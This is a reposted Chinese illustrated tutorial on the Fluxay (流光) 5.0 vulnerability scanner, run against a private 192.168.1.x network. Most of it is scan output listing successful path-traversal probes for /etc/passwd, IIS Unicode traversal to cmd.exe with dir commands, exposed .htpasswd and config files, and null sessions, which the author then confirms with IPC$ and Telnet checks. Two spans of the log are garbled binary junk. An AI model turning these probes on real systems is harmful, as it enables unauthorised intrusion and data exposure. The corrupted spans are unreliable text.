图解流光5.0

【流光5.0下载地址：https://www.newasp.net/soft/67164.html】

一 安装

点击圆形中有个下箭头的图标安装；

二 初次使用

主界面；

高级扫描设置；

选的检测项目太多，导致了后面一堆设置；

先都了解下；

开始扫描；下面是扫描中的几幅截图；

扫描的进度条，和动态的任务栏图标；

三 战果

看下战果；好多；

CGI-> 检测 192.168.1.241 /../../etc/passwd ...成功
CGI-> 检测 192.168.1.241 /../../../etc/passwd ...成功
CGI-> 检测 192.168.1.241 /../../../../../etc/passwd ...成功
PORT-> 主机 192.168.1.240 端口 8000 ...开放
PORT-> 主机 192.168.1.242 端口 0445 ...开放
PORT-> 主机 192.LDω楙鶜夀嬪]?h楼>嫯轏6?Oㄝ钆o雫*跞釿嵧們Y/镚?1姕?櫋?B~2???畧光书枯]ぃ?dz擲鄘#?敌9哗8?X$蟉~甖E乫曋{搣襮G?舟盄s睳|U??B鋁@p澹}eCPLUGIN-> 主机 192.168.1.246 在端口 80 连接失败, 中止....
PLUGIN-> 扫描 192.168.1.242 ...Remote Host OS is Maybe WinXP (Via SMB) 
IPC-> 主机 192.168.1.250 建立空连接 ...成功
PLUGIN-> 扫描 192.168.1.242 ...Remote Host Null Session could be Established. 
PLUGIN-> 扫描 192.168.1.246 ...Remote Host OS is Maybe WinXP (Via SMB) 
PORT-> 主机 192.168.1.250 端口 0445 ...开放
PORT-> 主机 192.168.1.250 端口 0445 ...开放
PLUGIN-> 扫描 192.168.1.245 ...Remote Host OS is Maybe WinXP (Via SMB) 
PLUGIN-> 扫描 192.168.1.250 ...Remote Host OS is Windows Server 2003 3790 Service Pack 2 (Via SMB) 
PLUGIN-> 扫描 192.168.1.250 ...Remote Host Null Session could be Established. 
PLUGIN-> 扫描 192.168.1.241 ...FrontPage 2000 Extension Exploit
CGI-> 检测 192.168.1.250 /cgi-bin/../../../../winnt/system32/cmd.exe ...成功
CGI-> 检测 192.168.1.254 /..\..\..\..\..\autoexec.bat ...成功
CGI-> 检测 192.168.1.188 /index.htm ...成功
CGI-> 检测 192.168.1.190 /index.jsp%3f/ ...成功
CGI-> 检测 192.168.1.191 /index.htm ...成功
CGI-> 检测 192.168.1.190 /img ...成功
CGI-> 检测 192.168.1.240 /index.asp ...成功
CGI-> 检测 192.168.1.190 /database/.htpasswd ...成功
CGI-> 检测 192.168.1.190 /Default.asp ...成功
CGI-> 检测 192.168.1.190 /config/config.txt ...成功
CGI-> 检测 192.168.1.190 /default.asp\ ...成功
CGI-> 检测 192.168.1.190 /database/.htpasswd ...成功
CGI-> 检测 192.168.1.190 /default.asp\\ ...成功
CGI-> 检测 192.168.1.190 /config/orders.txt ...成功
CGI-> 检测 192.168.1.190 /config/html/cnf_gi.htm ...成功
CGI-> 检测 192.168.1.190 /connect ...成功
CGI-> 检测 192.168.1.190 /cmd.exe ...成功
CGI-> 检测 192.168.1.190 /default.asp%2e ...成功
CGI-> 检测 192.168.1.190 /default.asp. ...成功
CGI-> 检测 192.168.1.190 /default.asp%2e%41sp ...成功
CGI-> 检测 192.168.1.190 /clients.cgi ...成功
CGI-> 检测 192.168.1.190 /config.sys ...成功
CGI-> 检测 192.168.1.190 /config/ ...成功
CGI-> 检测 192.168.1.190 /com2 ...成功
CGI-> 检测 192.168.1.250 /_vti_cnf/..%c1%9c../..%c1%9c../..%c1%9c../winnt/system32/cmd.exe?/c+dir ...成功
CGI-> 检测 192.168.1.190 /clients.php3 ...成功
CGI-> 检测 192.168.1.190 /clients.exe ...成功
CGI-> 检测 192.168.1.190 /clients.htm ...成功
CGI-> 检测 192.168.1.190 /clients.dbf ...成功
CGI-> 检测 192.168.1.190 /com4 ...成功
CGI-> 检测 192.168.1.190 /com3 ...成功
CGI-> 检测 192.168.1.190 /cmd1.exe?/c+dir ...成功
CGI-> 检测 192.168.1.190 /com1 ...成功
CGI-> 检测 192.168.1.190 /cmd.exe?/c+dir ...成功
CGI-> 检测 192.168.1.190 /cmd1.exe ...成功
CGI-> 检测 192.168.1.190 /cmd.exe?/c+dir%20c:\ ...成功
CGI-> 检测 192.168.1.190 /clients.dbf ...成功
CGI-> 检测 192.168.1.241 /index.htm ...成功
CGI-> 检测 192.168.1.190 /cgi-bin/user.log ...成功
CGI-> 检测 192.168.1.211 /cgi-bin/shopper.cgi ...成功
CGI-> 检测 192.168.1.240 /cgi-bin/unlg1.1 ...成功
CGI-> 检齦瘲蟘~ kS杵 織€;8筙鷴DV氛vEo賢C墰ヘ"?3霢<様諒9
q]兴功
CGI-> 检测 192.168.1.197 /?wp-html-rend ...成功
CGI-> 检测 192.168.1.190 /cgi-bin/bizdb1-search.cgi ...成功
CGI-> 检测 192.168.1.211 /cgi-bin/cmd32.exe?/c+dir ...成功
CGI-> 检测 192.168.1.197 /../../../../etc/passwd ...成功
CGI-> 检测 192.168.1.197 /../../etc/passwd ...成功
CGI-> 检测 192.168.1.190 /apache ...成功
CGI-> 检测 192.168.1.195 /?wp-html-rend ...成功
CGI-> 检测 192.168.1.195 /?S=D ...成功
CGI-> 检测 192.168.1.195 /?wp-html-rend ...成功
CGI-> 检测 192.168.1.190 /?S=D ...成功
CGI-> 检测 192.168.1.190 /?PageServices ...成功
CGI-> 检测 192.168.1.190 /?M=A ...成功
CGI-> 检测 192.168.1.190 /tool/ ...成功
CGI-> 检测 192.168.1.190 /.passwrd ...成功
CGI-> 检测 192.168.1.190 /.pl ...成功
CGI-> 检测 192.168.1.190 /.pwd ...成功
CGI-> 检测 192.168.1.190 /.access ...成功
CGI-> 检测 192.168.1.190 /test/2.htm ...成功
CGI-> 检测 192.168.1.190 /usage/ ...成功
CGI-> 检测 192.168.1.190 /test/test.htm ...成功
CGI-> 检测 192.168.1.190 /test/index.htm ...成功
CGI-> 检测 192.168.1.190 /weblog/ ...成功
CGI-> 检测 192.168.1.190 /weblogs/ ...成功
CGI-> 检测 192.168.1.190 /tools/ ...成功
CGI-> 检测 192.168.1.190 /statistics/ ...成功
CGI-> 检测 192.168.1.190 /sources/ ...成功
CGI-> 检测 192.168.1.190 /temp/ ...成功
CGI-> 检测 192.168.1.190 /.htaccess ...成功
CGI-> 检测 192.168.1.190 /server-status/ ...成功
CGI-> 检测 192.168.1.190 /set/ ...成功
CGI-> 检测 192.168.1.190 /server-status/ ...成功
CGI-> 检测 192.168.1.190 /setup/ ...成功
CGI-> 检测 192.168.1.188 /?PageServices ...成功
CGI-> 检测 192.168.1.190 /stats/ ...成功
CGI-> 检测 192.168.1.190 /public/ ...成功
CGI-> 检测 192.168.1.190 /private/ ...成功
CGI-> 检测 192.168.1.193 /?wp-html-rend ...成功
CGI-> 检测 192.168.1.190 /manual/ ...成功
CGI-> 检测 192.168.1.190 /logging/ ...成功
CGI-> 检测 192.168.1.190 /linux/ ...成功
CGI-> 检测 192.168.1.193 /?PageServices ...成功
CGI-> 检测 192.168.1.195 /../../../../../etc/passwd ...成功
CGI-> 检测 192.168.1.190 /library/ ...成功
CGI-> 检测 192.168.1.190 /include/inc/ ...成功
CGI-> 检测 192.168.1.190 /includes/ ...成功
CGI-> 检测 192.168.1.190 /include/inc/ ...成功
CGI-> 检测 192.168.1.190 /ideas/ ...成功
CGI-> 检测 192.168.1.190 /install/ ...成功
CGI-> 检测 192.168.1.195 /../../etc/passwd ...成功
CGI-> 检测 192.168.1.190 /inc/ ...成功
CGI-> 检测 192.168.1.195 /../../../etc/passwd ...成功
CGI-> 检测 192.168.1.190 /inc/ ...成功
CGI-> 检测 192.168.1.190 /deny/ ...成功
CGI-> 检测 192.168.1.190 /../../../etc/passwd ...成功

四 确认战果

看下是否192.168.1.87打开23端口；输入下图命令；

弹出Telnet 192.168.1.187 的登录窗口，表明该机23端口打开；

IPC-> 主机 192.168.1.250 建立空连接 ...成功

检测结果192.168.1.250可建立空连接；看下情况是否属实；

敲入下图第一条命令，建立了空连接；

后面的命令，查看建立了空连接的远程主机的资源，看不到，因为此类方法现在一般都被杀软禁止了；

看下本机显示的共享列表，提示 服务器服务未启动；

从控制台启动服务器服务，提示被禁用；

修改服务器服务的属性为手动；

启动服务器服务；

看下共享；黄色所示即为上面建立的空连接；

CGI-> 检测 192.168.1.188 /index.htm ...成功

检测结果 192.168.1.188存在网站，试下；打开了一个页面；

【转自：https://blog.csdn.net/bcbobo21cn/article/details/52083612】